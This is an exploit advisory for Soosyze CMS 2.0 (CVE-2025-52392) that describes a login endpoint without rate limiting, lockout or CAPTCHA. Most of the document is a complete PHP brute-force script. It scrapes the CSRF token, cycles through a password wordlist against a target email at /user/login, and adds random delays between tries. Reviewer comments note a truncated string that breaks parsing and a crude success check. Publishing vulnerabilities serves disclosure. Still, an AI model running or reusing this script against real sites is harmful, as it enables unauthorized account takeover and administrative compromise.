=============================================================================================================================================
| # Title Soosyze CMS 2.0 Brute Forcer
=============================================================================================================================================
| # Title : Soosyze CMS 2.0 - Authentication Brute Force Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/soosyze/soosyze |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/208515/ & CVE-2025-52392
[+] Summary : Soosyze CMS version 2.0 is vulnerable to a brute-force authentication attack due to the absence of rate limiting, CAPTCHA enforcement, and account lockout mechanisms on the login endpoint `/user/login`.
An attacker can repeatedly submit authentication requests using a known email address and a password wordlist, allowing unlimited login attempts until valid credentials are discovered.
This vulnerability may lead to full account compromise and unauthorized administrative access.
[+] POC: php poc.php wordlist.txt
<?php
// Soosyze CMS 2.0 login brute-force PoC: walks a password list against one account
// at /user/login (see the advisory header above). Usage: php poc.php [wordlist.txt]
declare(strict_types=1);
error_reporting(E_ALL);
ini_set('display_errors', '1');
// Target as shipped: a local instance on port 8000; the login form lives at /user/login.
$baseUrl = 'http://localhost:8000';
$loginPath = '/user/login';
$formUrl = $baseUrl . $loginPath;
// Declared but never read: postLogin() hard-codes the 'email' / 'password' keys itself.
$emailField = 'email';
$passField = 'password';
// NOTE(review): the value on the next line is truncated in this listing (the string
// literal is never closed), so the file will not parse as shown. The original presumably
// held the address of the account under test; the loop below reads it from this variable,
// not from the command line.
$targetEmail = '
$defaultWords = [
'123456',
'admin',
'password',
'qwerty',
'letmein',
'admin123',
'password1'
];
// Optional wordlist path (first CLI argument), one candidate per line. Without a readable
// file the built-in $defaultWords list above is used.
$wordlistFile = $argv[1] ?? null;
$words = $defaultWords;
if ($wordlistFile && is_readable($wordlistFile)) {
// file() keeps the line terminators, trim() strips them. file() returns false on failure and
// array_map() would then fail (TypeError on PHP 8); is_readable() only narrows that window.
$words = array_map('trim', file($wordlistFile));
}
// One cookie jar for the whole run: both the GET of the form and the POST reuse it.
// tempnam() returns false on failure, which the string-typed helpers below would reject.
$cookieFile = tempnam(sys_get_temp_dir(), 'soosyze_');
function curlRequest(string $url, array $options = []): string
{
    // Fixed transfer settings. With array "+" the left operand wins on duplicate keys,
    // so a caller cannot override these through $options — in particular TLS peer and
    // host verification stay disabled for every request this script makes.
    $fixed = [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ];

    $handle = curl_init($url);
    curl_setopt_array($handle, $fixed + $options);
    $body = curl_exec($handle);
    curl_close($handle);

    // curl_exec() yields false on a transport failure; that, like any falsy body
    // ('' or '0'), is reported to the caller as an empty string.
    if (!$body) {
        return '';
    }

    return $body;
}
function getLoginForm(string $url, string $cookieFile): string
{
    // The same file is used as cookie jar and cookie source, so cookies set by this
    // response are persisted and re-sent on the following request through that file.
    $cookieOptions = [
        CURLOPT_COOKIEJAR => $cookieFile,
        CURLOPT_COOKIEFILE => $cookieFile,
    ];

    return curlRequest($url, $cookieOptions);
}
function extractCsrfToken(string $html): array
{
    // First input whose name contains "csrf" or "token" (case-insensitive), paired with
    // the next value="..." on the same line — there is no /s modifier, so "." does not
    // cross a newline. Returns [name, value], or ['', ''] when nothing matches.
    $pattern = '/name="([_a-zA-Z0-9:-]*(csrf|token)[_a-zA-Z0-9:-]*)".*?value="([^"]*)"/i';

    $matched = preg_match($pattern, $html, $found) === 1;
    if (!$matched) {
        return ['', ''];
    }

    // Group 1 is the full field name, group 3 its value (group 2 is only the csrf|token hit).
    [, $fieldName, , $fieldValue] = $found;

    return [$fieldName, $fieldValue];
}
function postLogin(
    string $url,
    string $email,
    string $password,
    string $cookieFile,
    string $tokenName,
    string $tokenValue
): string {
    // Field names are hard-coded as 'email' / 'password'. The CSRF field is appended only
    // when both its name and value are truthy (a token literally equal to '0' is dropped).
    $fields = ['email' => $email, 'password' => $password];
    if ($tokenName && $tokenValue) {
        $fields[$tokenName] = $tokenValue;
    }

    // Origin is rebuilt from the form URL's own scheme and host; Referer is the form URL.
    $scheme = parse_url($url, PHP_URL_SCHEME);
    $host = parse_url($url, PHP_URL_HOST);
    $headers = [
        'Content-Type: application/x-www-form-urlencoded',
        'Origin: ' . $scheme . '://' . $host,
        'Referer: ' . $url,
    ];

    $transfer = [
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($fields),
        CURLOPT_COOKIEJAR => $cookieFile,
        CURLOPT_COOKIEFILE => $cookieFile,
        CURLOPT_HTTPHEADER => $headers,
    ];

    return curlRequest($url, $transfer);
}
echo "[*] Starting authorized brute-force PoC on {$formUrl}\n";
$attempt = 0;
foreach ($words as $pw) {
    $attempt++;

    // Fetch the form before every POST so the cookie jar and CSRF token are current.
    $formHtml = getLoginForm($formUrl, $cookieFile);
    [$csrfName, $csrfValue] = extractCsrfToken($formHtml);

    $result = postLogin($formUrl, $targetEmail, $pw, $cookieFile, $csrfName, $csrfValue);

    // Success heuristic: the substring 'redirect' anywhere in the (location-followed)
    // response body. NOTE(review): this is a plain substring test, so any page that merely
    // contains the word produces a false positive.
    $looksLoggedIn = strpos($result, 'redirect') !== false;
    if ($looksLoggedIn) {
        echo "[+] Password FOUND: {$pw} (attempt {$attempt})\n";
        break;
    }

    echo "[-] Attempt {$attempt}: {$pw}\n";
    // Random 0.1–0.9 s pause between attempts.
    usleep(random_int(100000, 900000));
}
// Remove the cookie jar; '@' hides the warning if the file was never created.
@unlink($cookieFile);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================